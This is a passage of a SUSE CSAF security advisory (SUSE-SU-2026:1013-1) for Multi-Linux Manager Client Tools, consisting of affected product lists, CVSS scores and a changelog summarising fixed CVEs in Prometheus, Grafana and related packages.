"category": "external",
"summary": "CVE-2026-27606",
"url": "https://www.suse.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "SUSE Bug 1258846 for CVE-2026-27606",
"url": "https://bugzilla.suse.com/1258846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2026-27606"
}
]
}
SUSE-SU-2026:1013-1
Vulnerability from csaf_suse - Published: 2026-03-25 10:11 - Updated: 2026-03-25 10:11Summary
Security update 5.0.7 for Multi-Linux Manager Client Tools
Severity
Important
Notes
Title of the patch: Security update 5.0.7 for Multi-Linux Manager Client Tools
Description of the patch: This update fixes the following issues:
dracut-saltboot:
- Version update to 1.1.0:
* Retry DHCP requests up to 3 times (bsc#1253004)
golang-github-QubitProducts-exporter_exporter:
- Non-customer-facing optimization and update
golang-github-boynux-squid_exporter:
- Version update from 1.6.0 to 1.13.0 with the following highlighted changes and fixes (jsc#PED-14971):
* Added compatibility for Squid 6 and support for the squid-internal-mgr metrics path
* Added TLS and Basic Authentication to the exporter’s web interface
* Added support for the exporter to authenticate against the Squid proxy itself
* Allow the gathering of process information without requiring root privileges
* The exporter can now be configured using environment variables
* Added support for custom labels to all exported metrics for better data filtering
* New metrics to track if Squid is running (squid_up), how long a scrape takes, and if any errors occurred
* Added 'service time' metrics to analyze proxy speed and performance.
* Added a metric for open file descriptors (process_open_fds) to help prevent connection bottlenecks
* Corrected the squid_client_http_requests_total metric to ensure accurate reporting
golang-github-lusitaniae-apache_exporter:
- Version update from 1.0.8 to 1.0.10:
* Updated github.com/prometheus/client_golang to 1.21.1
* Updated github.com/prometheus/common to 0.63.0
* Updated github.com/prometheus/exporter-toolkit to 0.14.0
* Fixed signal handler logging
golang-github-prometheus-prometheus:
- Security issues fixed:
* CVE-2026-27606: Fixed arbitrary file write via path traversal in rollup (bsc#1258893)
* CVE-2026-25547: Fixed unbounded brace range expansion leading to excessive CPU and memory consumption (bsc#1257841)
* CVE-2026-1615, CVE-2025-61140 The old web UI is no longer built due to security issues (bsc#1257897, bsc#1257442)
* CVE-2025-13465: Bump lodash package to version 4.17.23 to fix prototype pollution vulnerability (bsc#1257329)
* CVE-2025-12816: Interpretation conflict vulnerability allowing bypassing cryptographic verifications (bsc#1255588)
- Version update from 2.53.4 to 3.5.0 with the following highlighted changes (jsc#PED-13824):
* Modernized Interface: Introduced a brand-new UI
* Enhanced Cloud and Auth: Added unified AWS service discovery (EC2, ECS, Lightsail) and Azure Workload Identity support
for more secure, native cloudauthentication.
* Performance Standards: Fully integrated OpenTelemetry (OTLP) ingestion and moved Native Histograms from experimental
to a stable feature.
* Advanced Data Export: Rolled out Remote Write 2.0, offering better performance and metadata handling when sending
data to external systems.
* Query Power: Added new PromQL functions (like first_over_time and last_over_time) and optimization for grouping
operations
* Better Visibility: The UI now displays detailed relabeling steps, scrape intervals, and timeouts, making it easier
to troubleshoot why targets aren't reporting correctly.
* Critical Fixes: Resolved significant memory leaks related to query logging and fixed bugs where targets were
accidentally being scraped multiple times
grafana:
- Security issues fixed:
* CVE-2026-21722: Public dashboards annotations: use dashboard timerange if time selection disabled (bsc#1258136)
* CVE-2026-21721: Fixed access control by the dashboard permissions API (bsc#1257337)
* CVE-2026-21720: Fixed unauthenticated DoS (bsc#1257349)
* CVE-2025-68156: Fixed potential DoS via unbounded recursion in builtin functions (bsc#1255340)
* CVE-2025-3415: Fixedexposure of DingDing alerting integration URL to Viewer level users (bsc#1245302)
- Version update from 11.5.10 to 11.6.11 with the following highlighted changes and fixes:
* Performance Boost: Introduced WebGL-powered geomaps for smoother map visualizations and
removed blurred backgrounds from UI overlays to speed up the interface
* One-Click Actions: Visualizations now support faster navigation via one-click links and actions
* Alerting History: Added version history for alert rules, allowing you to track changes over time
* Service Accounts: Automated the migration of old API keys to more secure Service Accounts upon startup
* Cron Support: Annotations now support Cron syntax for more flexible scheduling
* Identity and Auth: Hardened the Avatar feature (now requires sign-in) and fixed several login redirection issues
when Grafana is hosted on a subpath
* Data Source Support: Added support for Cloud Partner Prometheus data sources and improved Azure legend formatting
* Alerting Limits: Added size limits for expanded notification templates to prevent system strain
* RBAC: Integrated Role-Based Access Control (RBAC) into the Alertmanager via the reqAction field
* Data Consistency: Fixed several issues with Graphite and InfluxDB regarding how variables are handled in repeated
rows or nested queries
* Dashboard Reliability: Resolved bugs involving row repeats and 'self-referencing' data links
* Alerting Fixes: Patched a critical 'panic' (crash) caused by a race condition in alert rules and fixed issues where
contact points weren't working correctly
* URL Handling: Fixed a bug where 'true' values in URL parameters weren't being read correctly
prometheus-blackbox_exporter:
- Non-customer-facing optimization and update
spacecmd:
- Version update to 5.0.15:
* Fixed typo in spacecmd help ca-cert flag (bsc#1253174)
* Convert cached IDs to integer values (bsc#1251995)
* Fixed spacecmd binary file upload (bsc#1253659)
uyuni-tools:
- Version update to 0.1.38:
* Fixed cobbler configuration when migrating to standalone files (bsc#1256803)
* Detect custom apache and squid config in the /etc/uyuni/proxy folder
* Add ssh tuning to configure sshd (bsc#1253738)
* Ignore supportconfig errors (bsc#1255781)
* Bumped the default image tag to 5.0.7
* Removed cgroup mount for podman containers (bsc#1253347)
* Registry flag can be a string (bsc#1254589)
* Use static supportconfig name to avoid dynamic search (bsc#1257941)
Patchnames: SUSE-2026-1013,SUSE-SLE-Manager-Tools-15-2026-1013,SUSE-SLE-Manager-Tools-For-Micro-5-2026-1013,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-1013,openSUSE-SLE-15.6-2026-1013
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.6 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.2 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
9.8 (Critical)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update 5.0.7 for Multi-Linux Manager Client Tools",
"title": "Title of the patch"
},
{
"category": "description",
